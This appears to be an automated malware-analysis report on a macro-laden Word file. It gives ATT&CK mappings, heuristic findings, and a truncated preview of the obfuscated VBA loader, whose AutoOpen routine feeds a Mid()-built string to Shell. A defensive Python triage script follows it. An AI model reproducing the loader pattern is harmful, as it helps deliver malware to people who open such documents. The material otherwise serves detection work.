Verdict: MALICIOUS (risk score 304)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample fires the critical OLE_VBA_SHELL heuristic: its VBA macros call Shell(). An AutoOpen entry point is present, so the macro runs as soon as the document is opened, and the auto-exec code is obfuscated in the way loaders commonly are. In the extracted source, AutoOpen hands the return value of a helper function straight to the execution sink (`Shell$ XZGDjkTXd, 0`); the helper carves substrings out of long random-looking string constants with Mid() and pads the code with string concatenations and Array() literals that are never used, so the command never appears as a literal in the macro source. The visible preview is truncated before the final command is assembled, so a download-and-execute second stage is the likely but unconfirmed purpose; the p-code heuristic, which reports shell/download/object-execution tokens next to the auto-exec token, is consistent with that reading. OLE_LEGACY_WORDBASIC_AUTOEXEC also fired even though olevba did recover the VBA project; treat it as corroborating the AutoOpen finding rather than as a separate execution path.
Heuristics (9)
- ClamAV: Doc.Macro.Obfuscation-6355576-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
- VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, and documents whose source extraction failed, where no readable macro source is available.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the OOXML DrawingML namespace identifier, not a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | ClamAV | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 222285 bytes | 9560fb250d3fa1113aa1ab63cce0ac012db01c214441ba85f66ed8f711d36858 | No threats found | likely: carved artifact contains 88 long base64-like blob(s) |

Note that the ClamAV Doc.Macro.Obfuscation signature matched the parent document, not the carved macro source on its own.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "GvHspFqNb"
Sub AutoOpen()
jPPFUKDJM = "PlAGjiDBw" + "UwkEOuJvj" + "VRkQPOGzK" + "vMhivWGwD"
Shell$ XZGDjkTXd, 0
wFdGRYKVR = "wfAVwYdir" + "bwVlzjXHo" + "QlCNwQqMq" + "DOzLGuzHS"
End Sub
Function XZGDjkTXd()
IJSiMpijJz = "4RHj9LozHLNTRkDGMbVKzKzpjIBCBZduZNJrWCUaQjclBPO64RSzLmQ"
hTCqCrmXhZa = Mid(IJSiMpijJz, 6, 36)
TCzCWTu = Array("oSSvOtCs", "bCJjTkzL", "fSiMDTEb", "iXoIXSoi", "mMulFdPI")
PFcFzqj = Array("MbLhUBik", "KcrzkrQU", "NqNrEuVJ", "OfwGqMGC", "CWAcHWGj")
EFzkQjcd = Array("tDzubqtv", "waXOPYDR", "FCTpEXuw", "WovOrnMq", "kjzAzahX")
XldjkNXGr = "W4Aj53zWphQSC4jCNFFJzHH5r5rZrJYsCXYTQzwwMKhIGXJmwiiStDaLkKGvtaToQoFidhIizdAzJNwwQibJbGwdRvTwv"
JQtkV = Mid(XldjkNXGr, 28, 60)
GBmsAjwYP = Array("mBKQosmd", "SiWFDRbV", "JwYmvfDI", "NjdjaCUf", "UvDCNiKi")
nssOGvahpdE = Array("BRvIRHnS", "EcrwCubH", "wBCIODDP", "NrkHOYHf", "otkijurG")
qiZlVJFDirU = Array("tLiwLWcZ", "UwELbCQw", "NfvaWfEf", "ULKIKzXD", "KwOCYFEr")
LITPNo = "XU9bvHYv0cBQWBEmUVwHjOJIUSwInTMVCOUSCBujlOfkOntrfIIDaYjPDwGJazjlHpOIhmkSbNVUjYuhZGdiKJudfEOFvkIoitdYZkJtYqbNDOjfBZjUUBawukcdYiXqEjmpvWHowjGUhhaRXiEVAoUhTidoIjUtSlIWbzla1vGSlz"
LLwXaki = Mid(LITPNo, 12, 154)
FEAqwi = Array("OKnSUvEm", "dmQDzQjN", "HwdALUPX", "YBBfnNaI", "bEMMslLY")
EuXsQrNVwdn = Array("HXfXjUDu", "MBvZcDft", "uQuSuYzP", "MIbvEXVV", "nEsoosrD")
MZBNazm = Array("zGTmRAjY", "YSRcrsii", "YPLXsIpo", "jZmXKqFC", "ZqVnFNzL")
YsVYb = "E4iAanRQuicszLmbbnHlsUzcKAFJwRVHsAFwTQQvHlzsZKUlhziaquPnzaWEcGTcIUAwGpHLWLiGXFDAjTbzjuQwkSwttMSARUjEKXispXEfPJPuWWXIfUtNEBLosNRJsioDWwqIojJMqkibCCWXoKUzaVAIMqzbFumlUMYYjPTvVDmfaz"
pAumPWpDqZt = Mid(YsVYb, 8, 165)
YSanjz = Array("cDWlFtiu", "aKPYjTKo", "RiFsNINi", "NPCAXqdL", "SzvpmEin")
rcOCc = Array("vszAbjWF", "fjWaHFwT", "qoYqqdWk", "hEGjXVBM", "vSwUKMGj")
oAVcVF = Array("twVrTCEM", "BczwfswR", "VNTWZpiK", "iKfoIdId", "hrwtIfQf")
ibWTaVU = "UXtrdwwMjGsBCmrtrSRfIQZEVQDbCWNJiOwKNKpHhQzClwaOHQWiilWKjWlivVKMsiWoojjjcKzrSXSYqpTmAjftsnaqZHLMGlJCZmZbjpBUnirMEMrGBYLIDdvAGqHVzllhNPwDPsCLiLFOwO723Qk3WzlrnfQBtjwuz"
BRbwaiW = Mid(ibWTaVU, 6, 141)
jvzhVnh = Array("AufvVDhC", "VfwztjHD", "OLMJXPDX", "TWRovDJq", "woWfKmob")
rrMjG = Array("dcSdiLjz", "ktfzSHIk", "qHczlsHS", "VIAFNcsb", "WljuzasH")
lQfvWBSq = Array("mUDCYMYp", "jmoDKopk", "UzHWLikI", "ADajbNnQ", "OUMRoEuJ")
wqtPcjI = "DkvQjkrPMhjs9T"
OajKQiMVz = Mid(wqtPcjI, 11, 1)
qCihVsoKjn = Array("jKZanpQi", "vvZzSVwI", "kvBUmrNS", "zYoqbYvQ", "FznAEJUL")
EYKnPwfHC = Array("mrlfnpzt", "XEjtDaXs", "zGbPBaGW", "AJsUiwDb", "aqhuGifJ")
WmOYsI = Array("avTXrCMi", "avDwhFJM", "lOidzdKb", "AFSMsdlO", "bSoFHiiw")
AJCVXBj = "vGi0SctjhDlEDAzFMasjGiiHcRGoIsptAwEKdVCpHXPvQHVdczUONjYbuYfAWFXpOsEHwnbqXDZjPjrUwcMIXbfUXcQFqBTCzahYDOhpYdqKGpMKjKEttORmMjjTWVAVjXjoCTQhvXktkVNhQFYjzZJlJuLTiNSCdUbjFXINtWwVdXCrWBCRzTYJNwfHHzChEiQcjoL0mLIwE"
NwbTPTJck = Mid(AJCVXBj, 5, 191)
tAaHBLbLh = Array("wNtnsFtV", "jVIsDBLw", "krXmjAmz", "JoWOQDED", "jjjjjWiu")
JHbvTROOq = Array("MwfWUtLZ", "GrVPLsOw", "awiEiiEc", "QFIXUcNO", "JcanVQdP")
kOzfPGkQLO = Array("dzIYipsq", "RkInsdLh", "rCFPloEi", "iHFiSbbK", "TOalWjub")
UjAwF = "U1vc2AX4j1QGYNmPZDTlUDSXjlnHoMsCBrohXrtWwLfrLkHwMjndSwZjQQoTXdLwnOEhZErhKzoJXbMvirvHYOjDSERHDZzTAjEwjaXHpGTVKQMpEtpjiDXYiBOUnkilzVIoWPPDTY6r"
lwwfAvrvaKA = Mid(UjAwF, 11, 127)
iQrjXQW = Array("NRFkTaVf", "RsvSKOip", "tdubjJXq", "JwUdDaKL", "IiBTiTLD")
GzrYuDG = Array("lZRZjIAE", "klrslSrD", "tPaVGrcr", "ijKjMLGZ", "SqqJswJA")
lEPNJL = Array("zPtRiRZq", "mzZTtpzt", "zarwwTsY", "iSZvchLv", "FZXrwLIQ")
kbknmH = "oH8MVzGlZYolmbRMMwhiLoXbrjKwwNjmwsFsjj1XQ"
lwoiKVvn = Mid(kbknmH, 6, 27)
TIZiiN = Array("JTuOmnjc", "swMSGNCi", "WVmPsiNE", "mdOTSGvl", "RaniZdmr")
TuiHMslw = Array("mwCfVsos", "XsUcYtYf", "GpbIZMKm", "BaBjZXFt", "ivdvbijt")
zvflZXVKZHG = Array("oVvZlSNY", "CIYjBdSZ", "mPiurISz", "nbtdPc
... (truncated)
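The decoder shape described in the summary and in OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER can be triaged statically rather than by detonation. The following Python is an added example, not code from the analyzer or from the sample: a flow-insensitive constant folder that resolves Mid(), Chr(), StrReverse() and concatenation chains, then reports what reaches Shell(), alongside the auto-exec, secondary-sink and long base64-like blob checks the heuristics above describe. The SAMPLE_VBA module is constructed for the demonstration with a harmless command; it imitates the sample's shape (junk concatenations in AutoOpen, a helper Function that slices command fragments out of longer strings with Mid()) but is not the page's macros.bas, whose preview is truncated before the command is assembled. The names triage, fold, atom and split_top are this example's own.

```python
"""Static triage of a VBA module with the obfuscated-loader shape seen in this report.

Added example, not the analyzer's or the sample's code: a flow-insensitive constant folder
that resolves Mid()/Chr()/StrReverse()/concatenation chains and reports what reaches Shell(),
plus the auto-exec, secondary-sink and long-blob checks the heuristics describe.
"""
import re
from typing import Dict, List, Optional

AUTOEXEC = {"autoopen", "auto_open", "autoexec", "autoclose", "auto_close",
            "document_open", "document_close", "workbook_open"}
OTHER_SINKS = ("createobject", "getobject", "wscript.shell", ".run", ".exec")
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I)
SHELL_RE = re.compile(r"^\s*Shell\$?\s*\(?(?P<arg>[^,]+?)(?:,.*)?\)?\s*$", re.I)
CALL_RE = re.compile(r"^(\w+)\s*\((.*)\)$", re.S)
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # the report's "long base64-like blob" idea

# Constructed sample (hypothetical module, harmless command); the page's own macros.bas is truncated.
SAMPLE_VBA = '''\
Attribute VB_Name = "Module1"
Sub AutoOpen()
    junkA = "PlAGjiDBw" + "UwkEOuJvj"
    Shell$ BuildCmd(), 0
End Sub
Function BuildCmd()
    s1 = "xxxxcmd /c echo loader-testyyyy"
    p1 = Mid(s1, 5, 23)
    s2 = "zz > out.txtzz"
    p2 = Mid(s2, 3, 10)
    BuildCmd = p1 + p2
End Function
'''


def split_top(expr: str, seps: str) -> List[str]:
    """Split on separator characters that sit outside string literals and parentheses."""
    parts, cur, depth, in_str = [], [], 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch in seps and depth == 0:
                parts.append("".join(cur))
                cur = []
                continue
        cur.append(ch)
    parts.append("".join(cur))
    return parts


def fold(expr: str, env: Dict[str, str]) -> Optional[str]:
    """Constant-fold a VBA string expression; None when some term cannot be resolved statically."""
    out = []
    for tok in (t.strip() for t in split_top(expr, "+&")):
        val = atom(tok, env)
        if val is None:
            return None
        out.append(val)
    return "".join(out)


def atom(tok: str, env: Dict[str, str]) -> Optional[str]:
    if len(tok) >= 2 and tok[0] == tok[-1] == '"':
        return tok[1:-1].replace('""', '"')           # VBA doubles quotes inside literals
    m = CALL_RE.match(tok)
    if not m:
        return env.get(tok.lower())                   # plain variable
    fn, args = m.group(1).lower(), [a.strip() for a in split_top(m.group(2), ",")]
    if fn == "mid" and len(args) in (2, 3) and all(a.isdigit() for a in args[1:]):
        s = fold(args[0], env)
        if s is None:
            return None
        start = int(args[1]) - 1                      # Mid() is 1-based
        return s[start:] if len(args) == 2 else s[start:start + int(args[2])]
    if fn == "chr" and len(args) == 1 and args[0].isdigit():
        return chr(int(args[0]))
    if fn == "strreverse" and len(args) == 1:
        s = fold(args[0], env)
        return None if s is None else s[::-1]
    return env.get(fn)  # user Function: VBA returns whatever was assigned to the function's own name


def triage(vba: str) -> dict:
    lines = vba.splitlines()
    assigns = [(m.group(1).lower(), m.group(2)) for ln in lines if (m := ASSIGN_RE.match(ln))]
    env: Dict[str, str] = {}
    # Flow-insensitive fixpoint (last write wins): a Function defined after its caller still resolves.
    for _ in range(len(assigns) + 1):
        changed = False
        for name, expr in assigns:
            val = fold(expr, env)
            if val is not None and env.get(name) != val:
                env[name] = val
                changed = True
        if not changed:
            break
    autoexec = [m.group(1) for ln in lines if (m := PROC_RE.match(ln)) and m.group(1).lower() in AUTOEXEC]
    shell_calls = [{"line": i, "call": ln.strip(), "resolved": fold(m.group("arg"), env)}
                   for i, ln in enumerate(lines, 1) if (m := SHELL_RE.match(ln))]
    other = [i for i, ln in enumerate(lines, 1) if any(k in ln.lower() for k in OTHER_SINKS)]
    return {
        "autoexec": autoexec,
        "shell_calls": shell_calls,
        "other_sink_lines": other,
        "base64_blobs": len(BASE64_BLOB.findall(vba)),
        "loader_shape": bool(autoexec) and bool(shell_calls or other),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

Run it on a carved module with `triage(open(path).read())`. The folder is deliberately flow-insensitive (no branches, no loops, last assignment wins), which is enough for straight-line Mid() decoders like the one in this preview; loops over numeric char arrays or repeated hex decoding need a real emulator such as ViperMonkey instead, and a None in `resolved` is the signal to switch to one.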